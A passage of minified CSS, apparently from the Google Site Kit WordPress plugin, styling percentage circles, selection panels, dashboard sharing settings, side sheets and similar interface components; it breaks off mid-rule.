.googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-98 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-98 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-98 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-99 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-99 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-99 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-100 .googlesitekit-percentage-circle__slice{clip:rect(auto, auto, auto, auto)}.googlesitekit-percentage-circle--percent-100 .googlesitekit-percentage-circle__bar::after{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-100 .googlesitekit-percentage-circle__fill{border:.1em solid transparent;border-radius:50%;clip:rect(0, 0.5em, 1em, 0);height:.8em;position:absolute;transform:rotate(180deg);width:.8em}.googlesitekit-percentage-circle--percent-1 .googlesitekit-percentage-circle__bar{transform:rotate(3.6deg)}.googlesitekit-percentage-circle--percent-2 .googlesitekit-percentage-circle__bar{transform:rotate(7.2deg)}.googlesitekit-percentage-circle--percent-3 .googlesitekit-percentage-circle__bar{transform:rotate(10.8deg)}.googlesitekit-percentage-circle--percent-4 .googlesitekit-percentage-circle__bar{transform:rotate(14.4deg)}.googlesitekit-percentage-circle--percent-5 .googlesitekit-percentage-circle__bar{transform:rotate(18deg)}.googlesitekit-percentage-circle--percent-6 .googlesitekit-percentage-circle__bar{transform:rotate(21.6deg)}.googlesitekit-percentage-circle--percent-7 .googlesitekit-percentage-circle__bar{transform:rotate(25.2deg)}.googlesitekit-percentage-circle--percent-8 .googlesitekit-percentage-circle__bar{transform:rotate(28.8deg)}.googlesitekit-percentage-circle--percent-9 .googlesitekit-percentage-circle__bar{transform:rotate(32.4deg)}.googlesitekit-percentage-circle--percent-10 .googlesitekit-percentage-circle__bar{transform:rotate(36deg)}.googlesitekit-percentage-circle--percent-11 .googlesitekit-percentage-circle__bar{transform:rotate(39.6deg)}.googlesitekit-percentage-circle--percent-12 .googlesitekit-percentage-circle__bar{transform:rotate(43.2deg)}.googlesitekit-percentage-circle--percent-13 .googlesitekit-percentage-circle__bar{transform:rotate(46.8deg)}.googlesitekit-percentage-circle--percent-14 .googlesitekit-percentage-circle__bar{transform:rotate(50.4deg)}.googlesitekit-percentage-circle--percent-15 .googlesitekit-percentage-circle__bar{transform:rotate(54deg)}.googlesitekit-percentage-circle--percent-16 .googlesitekit-percentage-circle__bar{transform:rotate(57.6deg)}.googlesitekit-percentage-circle--percent-17 .googlesitekit-percentage-circle__bar{transform:rotate(61.2deg)}.googlesitekit-percentage-circle--percent-18 .googlesitekit-percentage-circle__bar{transform:rotate(64.8deg)}.googlesitekit-percentage-circle--percent-19 .googlesitekit-percentage-circle__bar{transform:rotate(68.4deg)}.googlesitekit-percentage-circle--percent-20 .googlesitekit-percentage-circle__bar{transform:rotate(72deg)}.googlesitekit-percentage-circle--percent-21 .googlesitekit-percentage-circle__bar{transform:rotate(75.6deg)}.googlesitekit-percentage-circle--percent-22 .googlesitekit-percentage-circle__bar{transform:rotate(79.2deg)}.googlesitekit-percentage-circle--percent-23 .googlesitekit-percentage-circle__bar{transform:rotate(82.8deg)}.googlesitekit-percentage-circle--percent-24 .googlesitekit-percentage-circle__bar{transform:rotate(86.4deg)}.googlesitekit-percentage-circle--percent-25 .googlesitekit-percentage-circle__bar{transform:rotate(90deg)}.googlesitekit-percentage-circle--percent-26 .googlesitekit-percentage-circle__bar{transform:rotate(93.6deg)}.googlesitekit-percentage-circle--percent-27 .googlesitekit-percentage-circle__bar{transform:rotate(97.2deg)}.googlesitekit-percentage-circle--percent-28 .googlesitekit-percentage-circle__bar{transform:rotate(100.8deg)}.googlesitekit-percentage-circle--percent-29 .googlesitekit-percentage-circle__bar{transform:rotate(104.4deg)}.googlesitekit-percentage-circle--percent-30 .googlesitekit-percentage-circle__bar{transform:rotate(108deg)}.googlesitekit-percentage-circle--percent-31 .googlesitekit-percentage-circle__bar{transform:rotate(111.6deg)}.googlesitekit-percentage-circle--percent-32 .googlesitekit-percentage-circle__bar{transform:rotate(115.2deg)}.googlesitekit-percentage-circle--percent-33 .googlesitekit-percentage-circle__bar{transform:rotate(118.8deg)}.googlesitekit-percentage-circle--percent-34 .googlesitekit-percentage-circle__bar{transform:rotate(122.4deg)}.googlesitekit-percentage-circle--percent-35 .googlesitekit-percentage-circle__bar{transform:rotate(126deg)}.googlesitekit-percentage-circle--percent-36 .googlesitekit-percentage-circle__bar{transform:rotate(129.6deg)}.googlesitekit-percentage-circle--percent-37 .googlesitekit-percentage-circle__bar{transform:rotate(133.2deg)}.googlesitekit-percentage-circle--percent-38 .googlesitekit-percentage-circle__bar{transform:rotate(136.8deg)}.googlesitekit-percentage-circle--percent-39 .googlesitekit-percentage-circle__bar{transform:rotate(140.4deg)}.googlesitekit-percentage-circle--percent-40 .googlesitekit-percentage-circle__bar{transform:rotate(144deg)}.googlesitekit-percentage-circle--percent-41 .googlesitekit-percentage-circle__bar{transform:rotate(147.6deg)}.googlesitekit-percentage-circle--percent-42 .googlesitekit-percentage-circle__bar{transform:rotate(151.2deg)}.googlesitekit-percentage-circle--percent-43 .googlesitekit-percentage-circle__bar{transform:rotate(154.8deg)}.googlesitekit-percentage-circle--percent-44 .googlesitekit-percentage-circle__bar{transform:rotate(158.4deg)}.googlesitekit-percentage-circle--percent-45 .googlesitekit-percentage-circle__bar{transform:rotate(162deg)}.googlesitekit-percentage-circle--percent-46 .googlesitekit-percentage-circle__bar{transform:rotate(165.6deg)}.googlesitekit-percentage-circle--percent-47 .googlesitekit-percentage-circle__bar{transform:rotate(169.2deg)}.googlesitekit-percentage-circle--percent-48 .googlesitekit-percentage-circle__bar{transform:rotate(172.8deg)}.googlesitekit-percentage-circle--percent-49 .googlesitekit-percentage-circle__bar{transform:rotate(176.4deg)}.googlesitekit-percentage-circle--percent-50 .googlesitekit-percentage-circle__bar{transform:rotate(180deg)}.googlesitekit-percentage-circle--percent-51 .googlesitekit-percentage-circle__bar{transform:rotate(183.6deg)}.googlesitekit-percentage-circle--percent-52 .googlesitekit-percentage-circle__bar{transform:rotate(187.2deg)}.googlesitekit-percentage-circle--percent-53 .googlesitekit-percentage-circle__bar{transform:rotate(190.8deg)}.googlesitekit-percentage-circle--percent-54 .googlesitekit-percentage-circle__bar{transform:rotate(194.4deg)}.googlesitekit-percentage-circle--percent-55 .googlesitekit-percentage-circle__bar{transform:rotate(198deg)}.googlesitekit-percentage-circle--percent-56 .googlesitekit-percentage-circle__bar{transform:rotate(201.6deg)}.googlesitekit-percentage-circle--percent-57 .googlesitekit-percentage-circle__bar{transform:rotate(205.2deg)}.googlesitekit-percentage-circle--percent-58 .googlesitekit-percentage-circle__bar{transform:rotate(208.8deg)}.googlesitekit-percentage-circle--percent-59 .googlesitekit-percentage-circle__bar{transform:rotate(212.4deg)}.googlesitekit-percentage-circle--percent-60 .googlesitekit-percentage-circle__bar{transform:rotate(216deg)}.googlesitekit-percentage-circle--percent-61 .googlesitekit-percentage-circle__bar{transform:rotate(219.6deg)}.googlesitekit-percentage-circle--percent-62 .googlesitekit-percentage-circle__bar{transform:rotate(223.2deg)}.googlesitekit-percentage-circle--percent-63 .googlesitekit-percentage-circle__bar{transform:rotate(226.8deg)}.googlesitekit-percentage-circle--percent-64 .googlesitekit-percentage-circle__bar{transform:rotate(230.4deg)}.googlesitekit-percentage-circle--percent-65 .googlesitekit-percentage-circle__bar{transform:rotate(234deg)}.googlesitekit-percentage-circle--percent-66 .googlesitekit-percentage-circle__bar{transform:rotate(237.6deg)}.googlesitekit-percentage-circle--percent-67 .googlesitekit-percentage-circle__bar{transform:rotate(241.2deg)}.googlesitekit-percentage-circle--percent-68 .googlesitekit-percentage-circle__bar{transform:rotate(244.8deg)}.googlesitekit-percentage-circle--percent-69 .googlesitekit-percentage-circle__bar{transform:rotate(248.4deg)}.googlesitekit-percentage-circle--percent-70 .googlesitekit-percentage-circle__bar{transform:rotate(252deg)}.googlesitekit-percentage-circle--percent-71 .googlesitekit-percentage-circle__bar{transform:rotate(255.6deg)}.googlesitekit-percentage-circle--percent-72 .googlesitekit-percentage-circle__bar{transform:rotate(259.2deg)}.googlesitekit-percentage-circle--percent-73 .googlesitekit-percentage-circle__bar{transform:rotate(262.8deg)}.googlesitekit-percentage-circle--percent-74 .googlesitekit-percentage-circle__bar{transform:rotate(266.4deg)}.googlesitekit-percentage-circle--percent-75 .googlesitekit-percentage-circle__bar{transform:rotate(270deg)}.googlesitekit-percentage-circle--percent-76 .googlesitekit-percentage-circle__bar{transform:rotate(273.6deg)}.googlesitekit-percentage-circle--percent-77 .googlesitekit-percentage-circle__bar{transform:rotate(277.2deg)}.googlesitekit-percentage-circle--percent-78 .googlesitekit-percentage-circle__bar{transform:rotate(280.8deg)}.googlesitekit-percentage-circle--percent-79 .googlesitekit-percentage-circle__bar{transform:rotate(284.4deg)}.googlesitekit-percentage-circle--percent-80 .googlesitekit-percentage-circle__bar{transform:rotate(288deg)}.googlesitekit-percentage-circle--percent-81 .googlesitekit-percentage-circle__bar{transform:rotate(291.6deg)}.googlesitekit-percentage-circle--percent-82 .googlesitekit-percentage-circle__bar{transform:rotate(295.2deg)}.googlesitekit-percentage-circle--percent-83 .googlesitekit-percentage-circle__bar{transform:rotate(298.8deg)}.googlesitekit-percentage-circle--percent-84 .googlesitekit-percentage-circle__bar{transform:rotate(302.4deg)}.googlesitekit-percentage-circle--percent-85 .googlesitekit-percentage-circle__bar{transform:rotate(306deg)}.googlesitekit-percentage-circle--percent-86 .googlesitekit-percentage-circle__bar{transform:rotate(309.6deg)}.googlesitekit-percentage-circle--percent-87 .googlesitekit-percentage-circle__bar{transform:rotate(313.2deg)}.googlesitekit-percentage-circle--percent-88 .googlesitekit-percentage-circle__bar{transform:rotate(316.8deg)}.googlesitekit-percentage-circle--percent-89 .googlesitekit-percentage-circle__bar{transform:rotate(320.4deg)}.googlesitekit-percentage-circle--percent-90 .googlesitekit-percentage-circle__bar{transform:rotate(324deg)}.googlesitekit-percentage-circle--percent-91 .googlesitekit-percentage-circle__bar{transform:rotate(327.6deg)}.googlesitekit-percentage-circle--percent-92 .googlesitekit-percentage-circle__bar{transform:rotate(331.2deg)}.googlesitekit-percentage-circle--percent-93 .googlesitekit-percentage-circle__bar{transform:rotate(334.8deg)}.googlesitekit-percentage-circle--percent-94 .googlesitekit-percentage-circle__bar{transform:rotate(338.4deg)}.googlesitekit-percentage-circle--percent-95 .googlesitekit-percentage-circle__bar{transform:rotate(342deg)}.googlesitekit-percentage-circle--percent-96 .googlesitekit-percentage-circle__bar{transform:rotate(345.6deg)}.googlesitekit-percentage-circle--percent-97 .googlesitekit-percentage-circle__bar{transform:rotate(349.2deg)}.googlesitekit-percentage-circle--percent-98 .googlesitekit-percentage-circle__bar{transform:rotate(352.8deg)}.googlesitekit-percentage-circle--percent-99 .googlesitekit-percentage-circle__bar{transform:rotate(356.4deg)}.googlesitekit-percentage-circle--percent-100 .googlesitekit-percentage-circle__bar{transform:rotate(360deg)}.googlesitekit-percentage-circle--fast .googlesitekit-percentage-circle__bar,.googlesitekit-percentage-circle--fast .googlesitekit-percentage-circle__fill{border-color:#46732b}.googlesitekit-percentage-circle--average .googlesitekit-percentage-circle__bar,.googlesitekit-percentage-circle--average .googlesitekit-percentage-circle__fill{border-color:#895a00}.googlesitekit-percentage-circle--slow .googlesitekit-percentage-circle__bar,.googlesitekit-percentage-circle--slow .googlesitekit-percentage-circle__fill{border-color:#ac4220}.googlesitekit-post-searcher{display:flex;flex-wrap:wrap;position:relative;width:100%}.googlesitekit-post-searcher .googlesitekit-post-searcher__label{background-color:#fff;color:#5f6561;font-size:12px;left:12px;letter-spacing:.2px;padding:0 4px;position:absolute;top:-8px;z-index:4}.googlesitekit-post-searcher .googlesitekit-post-searcher__button-wrapper{flex:0 0 auto}.googlesitekit-post-searcher .googlesitekit-post-searcher__button-wrapper .googlesitekit-post-searcher__button{min-height:100%}.googlesitekit-preview-block{display:flex;flex-direction:column}.googlesitekit-preview-block--padding{padding:16px}.googlesitekit-preview-block--padding+.googlesitekit-preview-block--padding{padding-top:0}@media(min-width: 960px){.googlesitekit-preview-block--padding{padding:24px}}.googlesitekit-preview-block__wrapper{animation:googlesitekit-pulse 1s infinite ease-in-out;animation-direction:alternate;flex:1 1 auto}@media(prefers-reduced-motion: reduce){.googlesitekit-preview-block__wrapper{animation:none;background-image:linear-gradient(150deg, rgba(0, 0, 0, 0.05), rgba(0, 0, 0, 0.15))}}.googlesitekit-preview-block__wrapper--circle{border-radius:50%}@keyframes googlesitekit-pulse{0%{background-color:#ebeef0}100%{background-color:#cbd0d3}}.googlesitekit-preview-table{width:100%}.googlesitekit-preview-table .googlesitekit-preview-table__row{margin:0 0 9px}.googlesitekit-preview-table .googlesitekit-preview-table__row:last-child{margin-bottom:0}.googlesitekit-preview-table--padding{padding:16px}.googlesitekit-preview-table--padding+.googlesitekit-preview-table--padding{padding-top:0}@media(min-width: 960px){.googlesitekit-preview-table--padding{padding:24px}}.googlesitekit-progress-segments{background-color:#fff;border-radius:4px;display:flex;gap:4px;height:8px;justify-content:space-between;overflow:hidden}.googlesitekit-progress-segments .googlesitekit-progress-segments__segment{background-color:#ebeef0;height:8px;width:100%}.googlesitekit-progress-segments .googlesitekit-progress-segments__segment--active:nth-child(3n-2){background-color:#b8e5ca}.googlesitekit-progress-segments .googlesitekit-progress-segments__segment--active:nth-child(3n-1){background-color:#77ad8c}.googlesitekit-progress-segments .googlesitekit-progress-segments__segment--active:nth-child(3n){background-color:#3c7251}.googlesitekit-progress-indicator{background-color:#b8e5ca;display:grid;height:14px;justify-content:space-between;overflow:hidden}.googlesitekit-progress-indicator .googlesitekit-progress-indicator__segment{background-color:#5c9271;height:100%;position:relative;width:100%}.googlesitekit-progress-indicator .googlesitekit-progress-indicator__segment:not(.googlesitekit-progress-indicator__segment--final):last-child{border-radius:0 7px 7px 0}.googlesitekit-progress-indicator .googlesitekit-progress-indicator__segment:not(:only-child)::after{background-color:#f1fff7;border-radius:50%;content:"";height:6px;position:absolute;right:5px;top:4px;width:6px}.googlesitekit-selection-box{border-bottom:2px solid #dee3e5;outline:1px solid #fff;outline-offset:-1px;padding:6px 10px 6px 7px}.googlesitekit-selection-box .mdc-form-field{align-items:flex-start}.googlesitekit-selection-box .mdc-checkbox__content{padding-top:9px}.googlesitekit-selection-box .mdc-checkbox__content:has(.googlesitekit-badge){padding-top:8px}.googlesitekit-selection-box label{cursor:pointer;font-size:14px;font-weight:500;line-height:1.43;position:relative}.googlesitekit-selection-box label:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-selection-box label:focus{outline-offset:0}.googlesitekit-selection-box .mdc-checkbox__description{color:#6c726e;font-size:12px;line-height:1.33;padding:7px 0 5px}.googlesitekit-selection-box+.googlesitekit-selection-box{margin-top:16px}.googlesitekit-selection-box.googlesitekit-selection-box--disabled label,.googlesitekit-selection-box.googlesitekit-selection-box--disabled .mdc-checkbox__description{color:rgba(3,14,7,.32);pointer-events:none}.googlesitekit-plugin .googlesitekit-selection-panel{display:flex;flex-direction:column}.googlesitekit-plugin .googlesitekit-selection-panel-header{padding:16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-selection-panel-header{padding:24px}}.googlesitekit-plugin .googlesitekit-selection-panel-header h3{margin:0}.googlesitekit-plugin .googlesitekit-selection-panel-header p{color:#161b18;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:8px 0 0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-selection-panel-header p{font-size:14px}}.googlesitekit-plugin .googlesitekit-selection-panel-header .googlesitekit-cta-link__contents strong{font-weight:400}.googlesitekit-plugin .googlesitekit-selection-panel-header__row{align-items:center;display:flex;justify-content:space-between}.googlesitekit-plugin .googlesitekit-selection-panel-header__close{color:#6c726e;display:flex;padding:8px}.googlesitekit-plugin .googlesitekit-selection-panel__loading{border-bottom:2px solid #ebeef0;display:flex;justify-content:space-between;margin:8px 24px 10px;padding:6px 0}.googlesitekit-plugin .googlesitekit-selection-panel__loading:last-child{border:none}.googlesitekit-plugin .googlesitekit-selection-panel__loading-item{margin:0 0 10px}.googlesitekit-plugin .googlesitekit-selection-panel-items{overflow:auto}.googlesitekit-plugin .googlesitekit-selection-panel-items .googlesitekit-selection-panel-items__subheading{color:#6c726e;font-size:12px;font-weight:500;line-height:1.33;margin:16px 0 0 16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-selection-panel-items .googlesitekit-selection-panel-items__subheading{margin:24px 0 0 24px}}.googlesitekit-plugin .googlesitekit-selection-panel-items .googlesitekit-selection-panel-items__subheading:first-child{margin:0 0 0 16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-selection-panel-items .googlesitekit-selection-panel-items__subheading:first-child{margin:0 0 0 24px}}.googlesitekit-plugin .googlesitekit-selection-panel-item{border-bottom:2px solid #ebeef0;display:flex;margin:0 16px;outline:1px solid #fff;outline-offset:-1px;padding:0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-selection-panel-item{border-color:#cbd0d3;margin:0 24px}}.googlesitekit-plugin .googlesitekit-selection-panel-item:last-child{border:none}.googlesitekit-plugin .googlesitekit-selection-panel-item .googlesitekit-selection-panel-item-error{color:#ac4220;padding-top:10px}.googlesitekit-plugin .googlesitekit-selection-panel-item .googlesitekit-selection-box{border:none;flex:1;outline:none;padding:0 4px 10px}.googlesitekit-plugin .googlesitekit-selection-panel-item .googlesitekit-selection-box .mdc-form-field{align-items:center;gap:5px}.googlesitekit-plugin .googlesitekit-selection-panel-item .googlesitekit-selection-box .mdc-checkbox__description{padding:0}.googlesitekit-plugin .googlesitekit-selection-panel-item .googlesitekit-selection-panel-item__subtitle{display:block;font-size:12px;letter-spacing:.2px;line-height:1.33;margin-bottom:6px}.googlesitekit-plugin .googlesitekit-selection-panel-item .googlesitekit-selection-panel-item__suffix{color:#161b18;font-size:14px;font-weight:500;line-height:1.43;padding:15px 10px}.googlesitekit-plugin .googlesitekit-selection-panel-item .mdc-checkbox{margin-top:6px}.googlesitekit-plugin .googlesitekit-selection-panel-notice{background-color:#ffe4b1;padding:16px 24px}.googlesitekit-plugin .googlesitekit-selection-panel-notice p{font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-selection-panel-error{align-items:anchor-center;flex-direction:row;padding:16px 24px}.googlesitekit-plugin .googlesitekit-selection-panel-footer{background-color:#f3f5f7;margin-top:auto;padding:12px 24px 24px;width:100%}.googlesitekit-plugin .googlesitekit-selection-panel-footer p{font-size:12px;letter-spacing:.2px;line-height:1.33}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-selection-panel-footer p{font-size:14px}}.googlesitekit-plugin .googlesitekit-selection-panel-footer .googlesitekit-error-text p{font-size:14px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-selection-panel-footer__content{align-items:center;column-gap:24px;display:flex;flex-wrap:wrap;justify-content:space-between;margin-top:12px}}.googlesitekit-plugin .googlesitekit-selection-panel-footer__item-count{font-size:14px;font-weight:500}.googlesitekit-plugin .googlesitekit-selection-panel-footer__item-count .googlesitekit-selection-panel-footer__item-count--max-count{color:#6c726e;font-weight:400}.googlesitekit-plugin .googlesitekit-selection-panel-footer__actions{align-items:center;column-gap:8px;display:flex;justify-content:flex-end}.googlesitekit-plugin .googlesitekit-selection-panel-footer__actions .googlesitekit-cta-link{color:#6c726e}.googlesitekit-plugin .googlesitekit-sharing-settings__button.mdc-button{background-color:transparent;box-shadow:none;color:#6c726e}.googlesitekit-plugin .googlesitekit-sharing-settings__button.mdc-button:focus,.googlesitekit-plugin .googlesitekit-sharing-settings__button.mdc-button:hover{background-color:rgba(22,27,24,.08);color:rgba(0,0,0,.87)}.googlesitekit-plugin .googlesitekit-sharing-settings__button.mdc-button:focus::after,.googlesitekit-plugin .googlesitekit-sharing-settings__button.mdc-button:hover::after{background-color:rgba(0,0,0,.87)}.googlesitekit-plugin .googlesitekit-sharing-settings__button.mdc-button:hover::before{opacity:.04}.googlesitekit-plugin .googlesitekit-sharing-settings-dialog .googlesitekit-dialog__content{padding-bottom:0}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-sharing-settings-dialog .googlesitekit-dialog__footer{border-color:transparent;box-shadow:none;padding:0}}.googlesitekit-plugin .googlesitekit-user-role-select{align-items:center;column-gap:12px;display:flex;flex-wrap:wrap;position:relative;row-gap:4px}.googlesitekit-plugin .googlesitekit-user-role-select:hover::before{background-color:rgba(22,27,24,.08);opacity:1}.googlesitekit-plugin .googlesitekit-user-role-select__button{border:1px solid #3c7251;border-radius:50%;box-shadow:none;color:#3c7251;display:flex;height:48px;min-height:auto;min-width:auto;padding:0;width:48px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-role-select__button{height:28px;width:28px}}.googlesitekit-plugin .googlesitekit-user-role-select__button:not(:disabled){background-color:#fff;color:#3c7251}.googlesitekit-plugin .googlesitekit-user-role-select__button svg{fill:#3c7251}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-role-select__button svg{height:14px;width:14px}}.googlesitekit-plugin .googlesitekit-user-role-select--open{align-items:flex-start;row-gap:8px}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings{color:#161b18;font-size:14px;line-height:1.14}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__header{align-items:flex-start;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:700;line-height:1.14}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--product{flex:0 0 50%}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--product svg{height:28px;width:28px}}.googlesitekit-plugin .googlesitekit-user-role-select__current-roles{color:#333935;display:block;font-size:14px;line-height:1.14}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-role-select__current-roles{flex:1}}.googlesitekit-plugin .googlesitekit-user-role-select__add-roles{display:block}.googlesitekit-plugin .googlesitekit-user-role-select__add-roles button{color:#999f9b;font-size:14px;font-weight:400;line-height:1.14}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--view{flex:1 1 30%;position:relative}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--view{align-items:center;display:flex;flex:1 1 45%}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__row{display:flex;flex-wrap:nowrap;gap:16px;position:relative}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__row--disabled::after{background-color:rgba(255,255,255,.6);content:"";display:block;height:100%;left:0;position:absolute;top:0;width:100%;z-index:1}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__row--editing{flex-direction:column}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__row--editing{align-items:flex-start;flex-direction:row}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__row--editing .googlesitekit-dashboard-sharing-settings__column--product{min-height:48px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__row--editing .googlesitekit-dashboard-sharing-settings__column--product{min-height:28px}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__module{border-bottom:1px solid #ebeef0;padding:16px 0}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__module:last-child{border-bottom:0}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__module .googlesitekit-dashboard-sharing-settings__column--product{align-items:center;display:flex;flex-flow:row nowrap;gap:12px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__module .googlesitekit-dashboard-sharing-settings__column--product{align-items:center;flex-flow:row nowrap;gap:16px}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__module-name{flex:1}.googlesitekit-plugin p.googlesitekit-dashboard-sharing-settings__note{color:#757575;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__select{height:48px;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__select{height:30px}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__select .mdc-select__selected-text{min-width:100px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__select .mdc-select__selected-text{min-width:140px}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__select .mdc-select__native-control{appearance:none;background:none;font-size:14px;height:48px !important;padding-bottom:0;padding-top:0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__select .mdc-select__native-control{height:30px !important;min-height:30px}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__select .mdc-select__dropdown-icon{bottom:auto;top:50%;transform:translateY(-50%)}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--manage{flex:1 1 45%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--manage{align-items:center;display:flex;flex:0 0 30%}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--manage .googlesitekit-dashboard-sharing-settings__note{align-items:flex-end;display:flex;flex-wrap:wrap;font-size:12px;letter-spacing:.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--manage .googlesitekit-dashboard-sharing-settings__note span:not(.googlesitekit-dashboard-sharing-settings__tooltip-icon){width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--manage .googlesitekit-dashboard-sharing-settings__note span:not(.googlesitekit-dashboard-sharing-settings__tooltip-icon){margin-right:4px;width:auto}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--manage .googlesitekit-dashboard-sharing-settings__note svg{fill:#757575}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__column--manage .googlesitekit-dashboard-sharing-settings__tooltip-icon{display:block;height:18px;line-height:1;margin:0 0 0 4px}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__footer{display:flex;flex-basis:100%;flex-direction:column;gap:24px;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__footer{align-items:center;display:flex;flex-direction:row;gap:32px;justify-content:flex-end;width:auto}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__footer-notice{margin:-0.625rem 0}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__footer-notice{padding:16px 16px 0}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__footer-actions{align-items:center;display:flex;flex:1;flex-direction:row;gap:32px;justify-content:flex-end}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__footer-actions{box-shadow:0 -1px 4px 2px rgba(60,64,67,.15);padding:16px}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings__footer-actions-right{align-items:center;display:flex;flex:1;flex-direction:row;gap:32px;grid-gap:32px;justify-content:flex-end}.googlesitekit-plugin p.googlesitekit-dashboard-sharing-settings__notice{background-color:#cbd0d3;border-radius:8px;color:#161b18;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0;padding:12px 24px;width:100%}@media(min-width: 600px){.googlesitekit-plugin p.googlesitekit-dashboard-sharing-settings__notice{padding:8px}}.googlesitekit-plugin p.googlesitekit-dashboard-sharing-settings__notice:empty{display:none}.googlesitekit-plugin .googlesitekit-user-role-select__chipset{display:flex;flex-wrap:wrap;gap:8px;padding:0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-role-select__chipset{flex:1;gap:10px}}.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings--has-multiple-admins .googlesitekit-dashboard-sharing-settings__column--product{align-items:flex-start;flex-basis:25%;flex-direction:column;max-width:25%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-dashboard-sharing-settings--has-multiple-admins .googlesitekit-dashboard-sharing-settings__column--product{align-items:center;flex-direction:row;max-width:none}}.googlesitekit-plugin .googlesitekit-side-sheet{background-color:#fff;bottom:0;overflow:hidden;position:fixed;right:0;top:0;transform:translateX(100%);transition:transform .5s;width:100%;z-index:10000}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-side-sheet{width:530px}}body.admin-bar .googlesitekit-plugin .googlesitekit-side-sheet{top:46px}@media(min-width: 783px){body.admin-bar .googlesitekit-plugin .googlesitekit-side-sheet{top:32px}}.googlesitekit-plugin .googlesitekit-side-sheet--open{transform:translateX(0)}.googlesitekit-plugin .googlesitekit-side-sheet-overlay{background-color:rgba(0,0,0,.6);height:100%;left:0;position:fixed;top:0;width:100%;z-index:9990}body.googlesitekit-side-sheet-scroll-lock{overflow:hidden}.googlesitekit-source-link{color:#6c726e;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1}.googlesitekit-source-link button{color:#108080;letter-spacing:inherit;line-height:inherit}.googlesitekit-source-link button:hover{color:#108080}.googlesitekit-plugin .googlesitekit-stepper{list-style:none;margin:0;padding:0}.googlesitekit-plugin .googlesitekit-stepper__step{gap:10px;margin:0}@media(min-width: 